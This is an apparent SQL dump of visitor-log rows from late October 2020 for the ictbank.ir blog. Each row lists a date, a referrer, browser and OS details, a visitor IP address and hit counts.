(5808,'2020-10-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','20.49.58.63','000',0,1,0),
(5809,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','14.232.223.154','000',0,1,0),
(5810,'2020-10-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','110.229.219.100','000',0,2,0),
(5811,'2020-10-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','123.19.254.160','000',0,13,0),
(5812,'2020-10-19','http://ictbank.ir/blog','WeChat','iOS','10.3.3',NULL,NULL,'','120.235.126.54','000',0,1,0),
(5813,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.193.112.3','000',0,1,0),
(5814,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','165.22.225.245','000',0,1,0),
(5815,'2020-10-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,4,0),
(5816,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','13.235.43.39','000',0,1,0),
(5817,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.46','000',0,1,0),
(5818,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.127','000',0,1,0),
(5819,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.138.202.5','000',0,1,0),
(5820,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.101','000',0,2,0),
(5821,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','43.241.57.18','000',0,1,0),
(5822,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.206','000',0,1,0),
(5823,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','31.186.8.164','000',0,1,0),
(5824,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.61','000',0,1,0),
(5825,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','115.68.182.136','000',0,1,0),
(5826,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.43.7.162','000',0,1,0),
(5827,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.208.52','000',0,1,0),
(5828,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.104.132','000',0,1,0),
(5829,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.210.171.129','000',0,1,0),
(5830,'2020-10-19','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','116.202.96.177','000',0,2,0),
(5831,'2020-10-19','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.117','000',0,2,0),
(5832,'2020-10-19','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.103','000',0,1,0),
(5833,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.127.163','000',0,1,0),
(5834,'2020-10-19','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5835,'2020-10-19','http://ictbank.ir/blog','WeChat','iOS','10.3.3',NULL,NULL,'','129.226.49.27','000',0,1,0),
(5836,'2020-10-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5837,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.43.128','000',0,1,0),
(5838,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.220.100.252','000',0,1,0),
(5839,'2020-10-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(5840,'2020-10-19','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.223.23.162','000',0,1,0),
(5841,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.171.57','000',0,1,0),
(5842,'2020-10-19','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','103.90.231.169','000',0,2,0),
(5843,'2020-10-19','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','170.178.163.218','000',0,3,0),
(5844,'2020-10-19','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','54.36.68.2','000',0,2,0),
(5845,'2020-10-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(5846,'2020-10-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(5847,'2020-10-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(5848,'2020-10-19','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','185.143.228.197','000',0,1,0),
(5849,'2020-10-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','154.16.46.204','000',0,1,0),
(5850,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.160.128.55','000',0,2,0),
(5851,'2020-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.71','000',0,2,0),
(5852,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.188.175','000',0,1,0),
(5853,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.138.202.5','000',0,1,0),
(5854,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.6.139.26','000',0,1,0),
(5855,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.51.49.254','000',0,1,0),
(5856,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.145.203.195','000',0,1,0),
(5857,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.101','000',0,1,0),
(5858,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.214.210.114','000',0,1,0),
(5859,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.29','000',0,1,0),
(5860,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.228.240.178','000',0,1,0),
(5861,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.66','000',0,1,0),
(5862,'2020-10-20','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','148.70.157.8','000',0,3,0),
(5863,'2020-10-20','http://82.102.9.14:80','Internet Explorer','Windows','6.1',NULL,NULL,'','221.231.126.2','000',0,1,0),
(5864,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.246.115','000',0,1,0),
(5865,'2020-10-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.228.27','000',0,3,0),
(5866,'2020-10-20','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.232.132.22','000',0,1,0),
(5867,'2020-10-20','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','62.210.92.175','000',0,1,0),
(5868,'2020-10-20','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','193.70.102.145','000',0,1,0),
(5869,'2020-10-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5870,'2020-10-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','39.101.1.61','000',0,1,0),
(5871,'2020-10-20','http://ictbank.ir/blog','WeChat','iOS','10.3.3',NULL,NULL,'','129.226.49.27','000',0,1,0),
(5872,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.235.237','000',0,1,0),
(5873,'2020-10-20','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','155.138.149.61','000',0,1,0),
(5874,'2020-10-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.182.210.34','000',0,2,0),
(5875,'2020-10-20','http://www.google.bg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwj92su-l8PsAhXspYsKHZKdAus4ChAWMAh6BAgIEAI&url=http%3A%2F%2Fictbank.ir%2Fblog%2Findex.php%2F2020%2F02%2F02%2Fimpdp-errors-ora-02374-ora-12899%2F&usg=AOvVaw2F6RP9HlzCHEZfQZtJhRnf','Internet Explorer','Windows','10.0',NULL,NULL,'','212.122.165.169','000',0,1,0),
(5876,'2020-10-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(5877,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.204.180','000',0,1,0),
(5878,'2020-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.59.178','000',0,1,0),
(5879,'2020-10-20','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.18.220.126','000',0,1,0),
(5880,'2020-10-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.89','000',0,3,0),
(5881,'2020-10-20','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','142.4.30.19','000',0,2,0),
(5882,'2020-10-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(5883,'2020-10-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5884,'2020-10-20','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(5885,'2020-10-21','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.26.68','000',0,1,0),
(5886,'2020-10-21','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','5.135.154.75','000',0,2,0),
(5887,'2020-10-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.113.36','000',0,1,0),
(5888,'2020-10-21','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','152.57.81.223','000',0,1,0),
(5889,'2020-10-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5890,'2020-10-21','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','103.13.29.198','000',0,2,0),
(5891,'2020-10-21','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(5892,'2020-10-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.11.199.4','000',0,1,0),
(5893,'2020-10-21','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','206.81.12.65','000',0,1,0),
(5894,'2020-10-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(5895,'2020-10-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(5896,'2020-10-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.6.166','000',0,1,0),
(5897,'2020-10-21','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.167','000',0,1,0),
(5898,'2020-10-21','http://design-arena.ir/blog','Avant Browser','Windows','5.1',NULL,NULL,'','68.183.104.51','000',0,1,0),
(5899,'2020-10-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.108.147','000',0,1,0),
(5900,'2020-10-21','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.233.220.207','000',0,1,0),
(5901,'2020-10-21','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','119.39.46.19','000',0,1,0),
(5902,'2020-10-21','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','110.167.215.6','000',0,1,0),
(5903,'2020-10-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.137','000',0,2,0),
(5904,'2020-10-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(5905,'2020-10-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(5906,'2020-10-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(5907,'2020-10-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(5908,'2020-10-22','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','37.194.188.26','000',0,1,0),
(5909,'2020-10-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','95.174.110.235','000',0,1,0),
(5910,'2020-10-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(5911,'2020-10-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.26','000',0,2,0),
(5912,'2020-10-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.226.97','000',0,1,0),
(5913,'2020-10-22','http://design-arena.ir/blog/wp-admin/setup-config.php','Android Browser','Android','2.2',NULL,NULL,'','220.181.77.162','000',0,2,0),
(5914,'2020-10-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,3,0),
(5915,'2020-10-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(5916,'2020-10-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.164.35.37','000',0,1,0),
(5917,'2020-10-22','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5918,'2020-10-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.22.32','000',0,1,0),
(5919,'2020-10-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.138.187','000',0,1,0),
(5920,'2020-10-22','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.214','000',0,2,0),
(5921,'2020-10-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.159.169','000',0,1,0),
(5922,'2020-10-22','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.236.214.71','000',0,1,0),
(5923,'2020-10-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.227.176.5','000',0,1,0),
(5924,'2020-10-22','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','54.195.18.19','000',0,1,0),
(5925,'2020-10-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(5926,'2020-10-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5927,'2020-10-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(5928,'2020-10-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','176.193.229.198','000',0,1,0),
(5929,'2020-10-23','http://design-arena.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','34.245.60.240','000',0,1,0),
(5930,'2020-10-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.22.95','000',0,1,0),
(5931,'2020-10-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,6,0),
(5932,'2020-10-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.180.36.109','000',0,1,0),
(5933,'2020-10-23','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','183.60.141.171','000',0,1,0),
(5934,'2020-10-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.34.166','000',0,1,0),
(5935,'2020-10-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5936,'2020-10-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(5937,'2020-10-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.65.46','000',0,1,0),
(5938,'2020-10-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,1,0),
(5939,'2020-10-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.223.247.10','000',0,1,0),
(5940,'2020-10-23','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.232.56.242','000',0,1,0),
(5941,'2020-10-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(5942,'2020-10-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5943,'2020-10-24','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','193.106.30.100','000',0,1,0),
(5944,'2020-10-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(5945,'2020-10-24','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','142.4.30.19','000',0,2,0),
(5946,'2020-10-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.105.151','000',0,1,0),
(5947,'2020-10-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.133.154','000',0,1,0),
(5948,'2020-10-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,1,0),
(5949,'2020-10-24','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.24.103.20','000',0,3,0),
(5950,'2020-10-24','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','185.106.129.123','000',0,2,0),
(5951,'2020-10-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.39.180.62','000',0,1,0),
(5952,'2020-10-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.113.122','000',0,1,0),
(5953,'2020-10-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.150.155','000',0,1,0),
(5954,'2020-10-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','195.146.37.2','000',0,19,0),
(5955,'2020-10-24','http://design-arena.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','34.245.155.7','000',0,1,0),
(5956,'2020-10-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.230.149','000',0,1,0),
(5957,'2020-10-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5958,'2020-10-24','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','82.99.229.34','000',0,1,0),
(5959,'2020-10-24','http://design-arena.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','34.244.153.12','000',0,1,0),
(5960,'2020-10-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(5961,'2020-10-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(5962,'2020-10-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(5963,'2020-10-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5964,'2020-10-24','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.91.138.189','000',0,1,0),
(5965,'2020-10-24','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','94.230.71.44','000',0,1,0),
(5966,'2020-10-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,3,0),
(5967,'2020-10-24','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5968,'2020-10-25','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','54.216.27.30','000',0,1,0),
(5969,'2020-10-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','209.141.37.62','000',0,1,0),
(5970,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.149.28','000',0,1,0),
(5971,'2020-10-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5972,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','123.30.238.216','000',0,2,0),
(5973,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.129','000',0,1,0),
(5974,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.68','000',0,1,0),
(5975,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.145','000',0,1,0),
(5976,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.107','000',0,1,0),
(5977,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.155','000',0,1,0),
(5978,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.46.46','000',0,1,0),
(5979,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.35','000',0,1,0),
(5980,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.15','000',0,1,0),
(5981,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.170.72.201','000',0,1,0),
(5982,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.69','000',0,1,0),
(5983,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.9','000',0,1,0),
(5984,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','165.227.90.42','000',0,1,0),
(5985,'2020-10-25','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','3.236.24.130','000',0,1,0),
(5986,'2020-10-25','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','193.106.30.100','000',0,1,0),
(5987,'2020-10-25','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','52.249.250.29','000',0,40,0),
(5988,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.160.88.75','000',0,1,0),
(5989,'2020-10-25','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.136.154.37','000',0,1,0),
(5990,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.142.153','000',0,1,0),
(5991,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.97.237','000',0,1,0),
(5992,'2020-10-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','34.209.172.63','000',0,1,0),
(5993,'2020-10-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(5994,'2020-10-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(5995,'2020-10-25','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','116.202.102.239','000',0,1,0),
(5996,'2020-10-25','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','76.23.203.95','000',0,1,0),
(5997,'2020-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','142.44.179.150','000',0,2,0),
(5998,'2020-10-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,3,0),
(5999,'2020-10-26','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','139.180.1.125','000',0,1,0),
(6000,'2020-10-26','http://ICTBANK.IR','Vivaldi','Windows','10.0',NULL,NULL,'','168.81.93.152','000',0,1,0),
(6001,'2020-10-26','http://ictbank.ir/blog','Chrome','OpenBSD','',NULL,NULL,'','110.164.175.19','000',0,1,0),
(6002,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.226.68','000',0,1,0),
(6003,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.176.125','000',0,1,0),
(6004,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.76.139','000',0,1,0),
(6005,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.111.106.179','000',0,1,0),
(6006,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.11','000',0,1,0),
(6007,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.214.210.114','000',0,1,0),
(6008,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.167','000',0,1,0),
(6009,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.59.186.242','000',0,1,0),
(6010,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.248.107','000',0,1,0),
(6011,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.30','000',0,1,0),
(6012,'2020-10-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(6013,'2020-10-26','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.234.57.117','000',0,3,0),
(6014,'2020-10-26','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','185.78.79.62','000',0,1,0),
(6015,'2020-10-26','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','193.70.102.144','000',0,1,0),
(6016,'2020-10-26','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','18.235.3.246','000',0,1,0),
(6017,'2020-10-26','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.236.155.104','000',0,1,0),
(6018,'2020-10-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.166.153.202','000',0,1,0),
(6019,'2020-10-26','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','47.92.84.235','000',0,1,0),
(6020,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.150.207','000',0,1,0),
(6021,'2020-10-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','116.202.102.239','000',0,1,0),
(6022,'2020-10-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','194.36.87.13','000',0,1,0),
(6023,'2020-10-26','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','173.211.80.56','000',0,1,0),
(6024,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.147.25','000',0,1,0),
(6025,'2020-10-26','http://mail.design-arena.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','128.199.131.220','000',0,2,0),
(6026,'2020-10-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,3,0),
(6027,'2020-10-26','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.133.86.241','000',0,1,0),
(6028,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.6.168','000',0,1,0),
(6029,'2020-10-26','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','217.77.117.56','000',0,1,0),
(6030,'2020-10-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(6031,'2020-10-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(6032,'2020-10-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6033,'2020-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','95.174.110.235','000',0,1,0),
